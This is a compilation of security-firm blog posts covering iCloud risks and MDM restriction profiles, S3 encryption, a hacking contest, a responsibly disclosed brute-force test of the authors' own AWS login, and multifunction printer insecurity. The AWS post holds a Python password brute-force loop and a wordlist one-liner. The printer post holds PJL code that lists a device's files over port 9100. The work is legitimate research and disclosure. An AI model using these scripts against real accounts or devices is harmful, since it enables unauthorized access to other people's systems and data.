Misc

Short iCloud Follow-Up

Following the basic iCloud discussion in this post, I would like to add some more technical information. The following items are a loose compilation of facts about the controls mentioned there which allow restricting iCloud usage. Basic iCloud usage, consisting of backup, document sync, and photo stream, can be deactivated using the most recent version of the iPhone Configuration Utility:

Since there are no default settings for these values, it is necessary to include the disabled entries in existing configuration profiles.

Another new feature which can be deactivated using configuration profiles is Siri. Even though this functionality is not directly related to iCloud at first glance, it still carries considerable threat potential. Looking at the SLA of the iPhone 4S, the following paragraph becomes relevant:
When you use Siri, the things you say will be recorded and sent to Apple to process your requests. Your device will also send Apple other information, such as your first name and nickname; the names, nicknames, and relationship with you (e.g., “my dad”) of your address book contacts; and song names in your collection (collectively, your “User Data”).

So Siri also uses cloud-based services in the background. The following screenshot shows the option to disallow the usage of Siri:

Considering this privacy-relevant submission of data, another new option of the most recent tool version becomes relevant: “Allow diagnostic data to be sent to Apple”. The two checked options in the following screenshots are also new features of the most recent version of the configuration utility:
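As mentioned above, these disabled entries have to be included in existing configuration profiles. A minimal sketch of doing so with Python's plistlib could look like the following; the restriction key names correspond to the documented com.apple.applicationaccess payload, while the file names are placeholders, and signed or encrypted profiles would have to be re-signed afterwards.

```python
import plistlib

# Sketch: add the iCloud, Siri, and diagnostic-data restrictions to an
# existing, unsigned configuration profile ("existing.mobileconfig" is a
# placeholder path).
with open("existing.mobileconfig", "rb") as f:
    profile = plistlib.load(f)

for payload in profile.get("PayloadContent", []):
    # The restrictions payload type used by the iPhone Configuration Utility.
    if payload.get("PayloadType") == "com.apple.applicationaccess":
        payload["allowCloudBackup"] = False           # no iCloud backup
        payload["allowCloudDocumentSync"] = False     # no document sync
        payload["allowPhotoStream"] = False           # no photo stream
        payload["allowAssistant"] = False             # disable Siri
        payload["allowDiagnosticSubmission"] = False  # no diagnostic data to Apple

with open("restricted.mobileconfig", "wb") as f:
    plistlib.dump(profile, f)
```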

That’s it for today’s short compilation of configuration options. Have a great week everybody,

Matthias

Building

iTrust. Or not?

A few days ago (on 10/12/2011) Apple launched its new cloud offering which is called — who would have guessed 😉 — iCloud. Since we’re performing quite some research in the area of cloud security, we had a first look at the basic functionality and concepts of the iCloud. Its main features include the possibility to store full backups of Apple devices (at least an iPhone, iPad, or iPod touch running iOS 5 or a Mac running OS X Lion 10.7.2 is required), photos, music, or documents online. The data to be stored online is initially pushed to the cloud storage and then synchronized to any device which is using the same iCloud account. From this moment on, all changes to the cloudified data are immediately synchronized to the iCloud and then pushed to all participating devices.

At this point, most infosec people might start to worry a little bit: the common cloud concept of centralized data storage on the premises of a third party does not sit well with the usual control-focused approach of most technical infosec guys. The resulting concerns can be attributed to several main cloud computing related risks (which were proposed by ENISA and are actually a very valuable piece of work):

  • Lock In: Given the way the cloud functionality is integrated into iOS and OS X, usage of iCloud might result in strong lock-in effects. It is neither possible to use a different backend cloud storage for this functionality nor to develop a product which provides similar functionality (see later paragraphs for examples).
  • Isolation Failure: This is probably the most prominent threat for many IT people, since it is highly related to technical implementation details. It includes, but is not limited to, breakout attacks from guest systems due to vulnerabilities in the hypervisor or unauthorised data access due to insufficient permission models in backend storage. Thinking of the trust factor consistency, Apple’s history of cloud-based services was not their “finest hour” (as Steve Jobs stated during his keynote on iCloud). Remembering this talk and the awkward MobileMe vulnerabilities, we would agree with that 😉
  • Loss of Governance: The loss of governance over data in the cloud is an intrinsic risk of cloud computing (also refer to the proposed system operation life cycle and the motivation given here). Again, referring to the explanations of the technical iCloud implementation in the later paragraphs, this loss might be even more relevant in the iCloud environment.
  • Data Protection Risks: Handing over responsibility for the storage of data to the cloud service provider, a customer also hands over the possibility to protect his valuable (or, more concretely: personal) data by controls of his choice. Reviewing Apple’s terms of service for the iCloud, the following paragraph is somewhat related to data protection issues: “You understand that in order to provide the Service and make your Content available thereon, Apple may transmit your Content across various public networks, in various media, and modify or change your Content to comply with technical requirements of connecting networks or devices or computers. You agree that the license herein permits Apple to take any such actions.” In addition, the Apple Privacy Policy states the following: “You further consent and agree that Apple may collect, use, transmit, process and maintain information related to your Account, and any devices or computers registered thereunder, for purposes of providing the Service, and any features therein, to you.” This is reminiscent of the Dropbox terms of service, which even state that Dropbox is allowed to transfer your data to anybody if that is necessary to assure the quality of the offered service. Thinking of the trust factor components, all of these risks become even more relevant since Apple relies on third-party cloud services (namely Amazon Web Services and Azure, according to several sources, including this one), which consequently must also fulfill certain security requirements in order to lower the vulnerability factors for the presented risks.

There are some more risks according to the ENISA study, but those are beyond the scope of this post. When we do such rough assessments as sample exercises during our cloud security workshops, the participants usually ask what “they can do”. Possible controls can be divided into two groups: controls which reduce the risk to a reasonable level and controls which prohibit the usage of the particular service.

When analyzing the cloud, the control mentioned first is almost always crypto. Speaking of cloud storage, crypto is a valid control to ensure that unauthorized access to data (e.g. due to isolation failure, physical access, or subpoena) has no relevant impact. The only requirement is that the encryption is performed on the client side (depending on the attacker model and on whether you trust your cloud service provider). For example, Amazon provides a feature called Server Side Encryption which encrypts any file that is stored within S3. Additionally, Amazon allows the implementation of a custom encryption client which enables customers to perform transparent encryption of all files stored in S3. The analysis of the security benefits, attacker models, and operational feasibility of these controls will be the subject of yet another blog post, but at least Amazon offers these encryption features (a short sketch of both variants can be found after the list of configuration options below).

The services offered by the iCloud differ a little bit in functionality (for example, the iCloud iTunes version is a kind of music streaming platform), but basically there are two API mechanisms which allow access to the iCloud backend. First, it is possible to store documents (where documents can be complete directory structures) in the iCloud; second, a so-called key-value store can be accessed. The access is encapsulated in dedicated API calls which take care of the complete data transfer, synchronization, and pushing operations using an iCloud daemon. So any use of the iCloud is strictly tied to an app (I would have called it an application ;-)) which has to use the introduced iCloud API calls. Even though I’m not that familiar with the iOS/OS X architecture, I would have guessed that it would have been easily possible to add client-side encryption using the internal keychain and the usual cryptographic mechanisms. Still, this is not the case, and it is questionable, given Apple’s focus on user experience, whether this feature will be implemented in the future.

This lack of an encryption option brings up the second class of controls, which restrict iCloud usage altogether. This is especially important in a corporate context, where full backups of devices would potentially expose sensitive corporate data to third parties. Even though the usage might be restricted by acceptable use policies, this might not be enough, since the feature can be activated accidentally: if a user logs in once to the iCloud frontend, which is possible using a regular Apple ID, the data synchronization is enabled by default and starts immediately (refer also to the quoted terms of service above). Since most corporate environments use MDM solutions, it is possible to restrict iCloud usage at least for iOS-based devices. The corresponding configuration profiles offer several options to disable the functionality (a sketch of a corresponding profile follows the list):

  • allowCloudBackup
  • allowCloudDocumentSync
  • allowPhotoStream
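As a rough sketch of how these keys end up in a profile, the following snippet generates a minimal restrictions payload with Python's plistlib. The identifiers, display names, and file name are placeholders; a production profile distributed via MDM would typically carry additional payloads and be signed.

```python
import plistlib
import uuid

# Restrictions payload disabling the iCloud features listed above.
restrictions = {
    "PayloadType": "com.apple.applicationaccess",
    "PayloadVersion": 1,
    "PayloadIdentifier": "com.example.restrictions",      # placeholder
    "PayloadUUID": str(uuid.uuid4()).upper(),
    "PayloadDisplayName": "iCloud Restrictions",
    "allowCloudBackup": False,
    "allowCloudDocumentSync": False,
    "allowPhotoStream": False,
}

# Top-level configuration profile wrapping the restrictions payload.
profile = {
    "PayloadType": "Configuration",
    "PayloadVersion": 1,
    "PayloadIdentifier": "com.example.icloud-restrictions",  # placeholder
    "PayloadUUID": str(uuid.uuid4()).upper(),
    "PayloadDisplayName": "Disable iCloud",
    "PayloadContent": [restrictions],
}

with open("disable-icloud.mobileconfig", "wb") as f:
    plistlib.dump(profile, f)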
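Coming back to the encryption controls mentioned above, the following sketch shows how Amazon's server-side encryption can be requested via the S3 API, and how data could instead be encrypted on the client side before upload. It assumes the boto3 SDK and the cryptography package; bucket and object names are placeholders, and this is not meant as a complete encryption client.

```python
import boto3
from cryptography.fernet import Fernet

s3 = boto3.client("s3")

# Server-side encryption: S3 encrypts the object at rest with an AES-256 key
# managed by Amazon ("my-bucket" is a placeholder bucket name).
with open("backup.tar.gz", "rb") as f:
    s3.put_object(Bucket="my-bucket", Key="backup.tar.gz",
                  Body=f.read(), ServerSideEncryption="AES256")

# Client-side encryption: the data never leaves the client unencrypted, so the
# provider only ever sees ciphertext. The key stays with the customer.
key = Fernet.generate_key()  # store this key safely, e.g. in a local keychain
with open("backup.tar.gz", "rb") as f:
    ciphertext = Fernet(key).encrypt(f.read())
s3.put_object(Bucket="my-bucket", Key="backup.tar.gz.enc", Body=ciphertext)
```

The trade-off between the two variants is exactly the trust question raised above: server-side encryption protects against physical access to the storage, while client-side encryption also removes the provider itself from the set of parties able to read the data.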

This concludes today’s little introduction to iCloud and some of its security and trust aspects. We will, however, continue to explore the attributes of iCloud more deeply in the near future (and we might even have a talk on it at Troopers ;-)).

So stay tuned… Matthias

Events

Packetwars, Sun & Skills

Over the last few days, some of our guys (including me) had a great time in Dayton. Rene, Christopher, Hendrik, Sergej, and I flew in to give workshops and presentations at Day-Con as well as to compete in the infamous PacketWars game. While Day-Con is a one-day event, the two days before the conference comprised workshops on secure iOS integration (given by Rene) and IPv6 security (given by Christopher). Since the overall topic of the conference was trust, Rene gave a keynote on broken trust which was based on exemplary trust analyses, the development of a trust metric, and different trust factors. Those trust factors were also used in my talk about evaluation methodologies for cloud service providers (regular followers will recognize some of the content of both talks from different posts 😉 ). There were also talks by Sergey Bratus, Graeme Neilson, and Angus Blitter. While Sergey proposed a sound (not to say academic 😉 ) definition for the classification of vulnerabilities and their connection to Turing-complete input languages, Angus gave an introduction to PowerLine technologies and laid out that these technologies still suffer from naive assumptions about trusted networks (he also referred to this).

The day after the conference, the ERNW Allstars had to defend their championship title in PacketWars. Since the first battle was scheduled for 10 AM, we had quite some time to tan in the sunny 30°C weather, recover from the conference, and prepare the expected victory celebration (some of you might remember a certain “Champagne tradition” from Troopers). Fueled by this motivation, we rushed through the three battles and took first place for the second year in a row. At this point, kudos to the two other participating teams who gave us a tough battle, especially during the reversing challenges.

 

Have a great week, Matthias

Breaking

The Key to your Datacenter

 

During our ongoing research on the security of cloud service providers and cloud-based applications, we performed a regular audit of our AWS account password. Thinking of popular incidents and evergreens in attack vectors, we were wondering what consequences an online bruteforce attack on our AWS password would have. So we decided to perform a bruteforce attack against our own account. Analyzing the login process of AWS, the following requirements for the bruteforce tool to be used could be derived (a rough sketch of such a tool follows the list):

  • Cookie Handling
  • HTTPS support
  • HTTP 3xx support.
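For illustration, here is a minimal sketch of a password tester meeting these requirements, based on Python's requests library. The login URL and form field names are placeholders; the real AWS sign-in form lives at a different URL and carries several hidden parameters that would have to be captured and replayed as well.

```python
import requests

# Placeholder values -- not the real AWS sign-in endpoint or field names.
LOGIN_URL = "https://signin.example.com/login"
EMAIL = "victim@example.com"

def try_password(password):
    with requests.Session() as session:   # cookie handling across requests
        resp = session.post(               # HTTPS is handled transparently
            LOGIN_URL,
            data={"email": EMAIL, "password": password},
            allow_redirects=False,         # inspect the 3xx response ourselves
        )
        # Heuristic from this post: a wrong password yields HTTP 200 (the
        # login page again), a correct one a 302 redirect.
        return resp.status_code == 302

for candidate in (f"{i:06d}" for i in range(1000000)):
    if try_password(candidate):
        print("valid password found:", candidate)
        break
```

In practice we did not use a custom script but Burp Intruder, as described below.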

It turned out that it was pretty hard to find a password testing tool which fulfilled these requirements and was able to actually handle the complex AWS login process — in the end, there was none. Since we use and like Burp Suite very much, Burp Intruder suggested itself as an alternative which is straightforward to configure, even though it might lack the speed and efficiency of specialized bruteforcing tools. Using Burp’s history, we were able to identify the request which triggered the login process:

After the request is sent to the Intruder, the password field is marked

and the payloads to be used are configured.

Using exemplary payloads, it is possible to identify a successful login attempt, since it results in a redirect to the authenticated area/SSO server/whatever, whereas a wrong password results in an HTTP 200 presenting the AWS login page again:

Having established this basic bruteforcing process, the wordlist to be used must be generated. To decide which complexity should be covered, the Amazon password policy must be analyzed — if the restrictions in place deserve to be called a policy. The only restriction is that the password must be between 6 and 20 characters (the upper limit was determined from the maxlength parameter of the field when changing the password via the web frontend, since there is no documentation available on this. Thinking of business needs, this behavior might be understandable, since Amazon loses "end users" and therefore money if its password policy is too strict). So we decided to use a wordlist which contains all passwords of 6 characters consisting of numbers (which can be generated pretty easily by reactivating some old Perl scripting skills: perl -le 'printf "%06d\n", $_ for (0..999999)' 😉 ). Such passwords might even be pretty common when thinking of "birthday passwords".

After performing about 400k requests, we paused the attack and searched for requests which resulted in an HTTP 302 response, just as the baseline request did.

And indeed, it was possible to bruteforce the password — which is not such a big surprise though. The bigger — and worse — surprise is that it was still possible to log in to our Amazon account after performing about 2 million requests (including some dry runs) within two days, originating from one single IP address, without the account being locked, throttled, or us being notified in any way. And we were performing about 80k requests per hour.

 

Coming back to the title of the blog post: at the time of our investigation, there were no protection mechanisms against bruteforce attacks on the key to your datacenter — which your AWS credentials actually can be, if you are hosting a large amount of your services in EC2. Following a responsible disclosure policy, we contacted the AWS Security Team and got a very comprehensive answer. As we expected, they pointed us to their MFA solution, which is basically, even though there was a major incident recently, a viable security control when authenticating users for data center access. In addition, we had a long and beneficial dialog about potential mechanisms such as connection throttling and account locking. The outcome of our discussion is a CAPTCHA mechanism which kicks in after a brute force attempt is detected — and which was also re-tested several times by our bruteforcing setup. It was quite impressive to see that Amazon was able to implement additional security measures in such a short time frame, considering the huge size and complexity of the AWS environment. So we were glad to get in touch with the committed AWS Security Team and happy to see that those guys really are into security and communicate openly with their customers.

Breaking

Sisters’ Act of MFD Security

Recently Micele and I were researching for our talk about the current state of security of Multifunction Devices (MFDs). Since we’re both seasoned pentesters who are quite familiar with MFDs, we were really surprised that very little new research is going on in the area of MFD security. While diving deeper into the topic, we found a very simple explanation for this: as in 2002, it is still possible to download print or scan jobs using PJL, many devices still offer default FTP or Telnet access, and, of course, stored files can be recovered from MFD hard drives — on an enterprise-wide scale. To further strengthen our impression of the current state of MFD security, most devices crashed or went wild while we performed some scans — and we are not talking about fuzzing here.
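To give an impression of how simple such access often is, here is a rough sketch of querying a device via PJL over the raw printing port 9100. The hostname is a placeholder, and whether a particular device answers these commands (or exposes its file system at all) depends on its model and configuration.

```python
import socket

UEL = b"\x1b%-12345X"   # PJL Universal Exit Language sequence
PJL_PORT = 9100         # raw printing port on most network printers/MFDs

def pjl_query(host, command):
    """Send a single PJL command and return the raw response."""
    with socket.create_connection((host, PJL_PORT), timeout=5) as sock:
        sock.sendall(UEL + b"@PJL " + command.encode() + b"\r\n" + UEL)
        chunks = []
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks).decode(errors="replace")

# Ask the device for its identification and list the root of its file system,
# which many MFDs expose via PJL ("printer.example.com" is a placeholder).
print(pjl_query("printer.example.com", "INFO ID"))
print(pjl_query("printer.example.com", 'FSDIRLIST NAME="0:\\" ENTRY=1 COUNT=65535'))
```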

This devastating result led to the question of how MFDs can be secured. Since there are a lot of MFD hardening resources out there, even from vendors, we decided to put together a comprehensive hardening guide for MFDs. To raise the level of awareness, we compiled a number of examples of attacks on MFDs and then focused on the development of our own MFD security guide, which is based on the seven sisters. The result of this approach can be found here. And of course, soon there will be an ERNW newsletter covering this topic in a more academic and structured way 😉

Misc

Intel’s Known Good Approach — Chances for a Paradigm Shift?

During the keynote of the Intel Developer Forum, Intel’s CEO Paul Otellini explained their motivation for the acquisition of McAfee: basically, Intel wants to make it possible to shift computer security from a known bad model to a known good model.

Coming back to some of our recent blog posts, we think that a reliable and working approach to application whitelisting would increase security in corporate environments — especially when thinking of the latest vulnerabilities with exploit code in the wild that could not be caught by any AV solution. As covered by this article, the chance that such an approach succeeds depends heavily on the critical mass that would use it. The widespread x86 architecture therefore is the perfect platform for establishing a widely used known good model.
